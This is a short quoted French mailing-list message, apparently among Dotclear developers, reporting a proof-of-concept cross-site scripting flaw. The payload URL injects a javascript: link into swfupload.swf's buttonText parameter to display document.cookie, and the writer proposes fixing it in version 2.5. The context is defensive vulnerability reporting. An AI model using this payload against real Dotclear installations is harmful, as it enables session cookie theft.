Le 12 mars 2013 06:54, Dsls <dsls(a)morefnu.org> a écrit :
poc sur dotclear:
<urldublog>/admin/index.php?pf=swfupload.swf&buttonText=<a%20href=%27javascript:alert(document.cookie)%27>Click%20me</a>
On est bien vulnérable.
à intégrer dans la 2.5 je pense